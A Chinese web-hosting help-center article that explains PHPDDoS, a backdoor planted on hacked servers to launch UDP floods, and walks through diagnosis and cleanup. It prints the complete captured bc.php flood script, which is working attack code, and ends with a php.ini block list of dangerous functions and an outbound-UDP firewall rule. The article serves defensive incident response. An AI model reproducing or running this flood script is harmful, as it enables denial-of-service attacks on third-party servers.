香港虚拟主机
本站公告
新闻资讯
虚拟主机帮助
域名帮助
服务器帮助
邮箱帮助
建站帮助
网站推广帮助
VPS帮助
特色主机帮助
网站备案专题
会员帮助信息
代理帮助信息
成功案例
网站百度排名下跌怎么办 教你…
新站应该做到的十条SEO检查方…
怎么注册域名 如何注册域名 …
苍南富生工艺品有限公司-定制…
爱名网注册域名修改NS服务器…
阳光互联注册域名修改NS服务…
万网注册域名修改NS服务器地…
中国数据注册域名修改NS服务…
商务中国注册域名修改NS服务…
新网注册域名修改NS服务器地…
您现在的位置: 江南数联 >> 帮助中心 >> 服务器帮助 >> 正文

PHPDDoS攻击以及解决方案

  作者:admin    来源:本站原创    点击次数:29     更新时间:2012-3-10 9:30:12  
     
 
关注石头有礼
 
 

PHPDDoS攻击以及解决方案

近期许多客户的WEB服务器出现对外发送UDP数据包的情况,使用云盾防火墙监控流量图如下:


 
发送UDP速度每秒10005。带宽几乎被占满。一般遭遇DDoS攻击带宽应该是接受,而这位客户的流量监控却是不停的对外发包。尝试关闭IIS,流量立即停止。判断此为近期流行的PHPDDOS后门木马造成的。
首先给大家扫盲什么是PHPDDOS?
phpddos是一种黑客通过入侵WEB服务器植入phpshell从而控制这台‘傀儡肉鸡’向其他受害者发送UDP攻击包进行DDOS攻击。
很明显,这位客户就是遭到了黑客入侵被植入PHP木马被利用来攻击别人的服务器了。找到了原因开始对症下药。
1.利用MRTG监控 发现网卡流量100M 狂丢包 偶尔通几个包
2.SSH登录服务器 用iftop统计是哪个IP流量最高
3.iptables -I INPUT -s 1.1.1.1 -j Drop
4.cat /var/log/httpd/access_log |grep 1.1.1.1
5.发现目录下有一个bc.php 访问地址为/include/bc.php?ip=1.1.1.1&port=80&time=600
 
费尽九牛二虎之力终于捕捉到元凶——就是这个php代码文件。
<?php
  $packets = 0;
  $ip = $_GET[\''ip\''];
  $rand = $_GET[\''port\''];
  set_time_limit(0);
  ignore_user_abort(FALSE);
  $exec_time = $_GET[\''time\''];
  $time = time();
  print \"Flooded: $ip on port $rand <br><br>\";
  $max_time = $time+$exec_time;
  for($i=0;$i<65535;$i++){
  $out .= \"X\";
  }
  while(1){
  $packets++;
  if(time() > $max_time){
  break;
  }
  $fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);
  if($fp){
  fwrite($fp, $out);
  fclose($fp);
  }
  }
  echo \"Packet complete at \".time(\''h:i:s\'').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";
?> 
工作原理:
  通过url传递IP和端口以udp的方式打开,传递文件到服务器写出,访问触发后会进行攻击他人服务器的行为。
解决方案:
1、服务-停止IIS
2、在c:\windows\php.ini里设置
disable_functions =gzinflate,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen
3、在c:\windows\php.ini里设其值为Off
allow_url_fopen = Off
4、检查extension=php_sockets.dll前面一定要有;
;extension=php_sockets.dll
好了,现在可以重启IIS了。
另外,对于没加密的php攻击代码,还可以用以下办法处理:
在IP策略,或防火墙中,禁止所有udp向外发送
 phpddos安全规则

解压后双击”udp.bat”即可自动创建安全规则。
若要核实安全规则是否创建成功,您可点击开始-程序-管理工具-本地安全策略-IP安全策略,若存在“DropUDP”则表明安全策略创建成功, 若您是Linux主机,请使用iptables自行创建相关规则。
至此phpddos清除完毕。

本章关健词:江南数联 域名注册 海外虚拟主机 G享虚拟主机 国内虚拟主机 企业邮箱 网站建设 自助建站 400电话申请 微聚商

 
  版权申请:PHPDDoS攻击以及解决方案出自江南数联dns06.com未经授权请勿转载!  
 
  • 上一篇帮助:

  • 下一篇帮助:
  •  
         

    扫一扫关注公众号有礼
    Copyright@2004-2015 江南数联 版权所有未经授权请勿复制!
    《中华人民共和国增值电信业务经营许可证》ISP证编号:皖B2-20080036 湘B2-20160056
    公司全称:永州石头网络技术有限公司(运营部)
    地址: 中国·湖南省永州市育才路158号 服务热线:400 616 9260
    安徽公司:安徽仁科信息技术有限公司 地址:合肥万和新城广场A-608 
    关注词:网站空间虚拟空间空间域名域名空间域名主机网站空间哪家好网站空间多少钱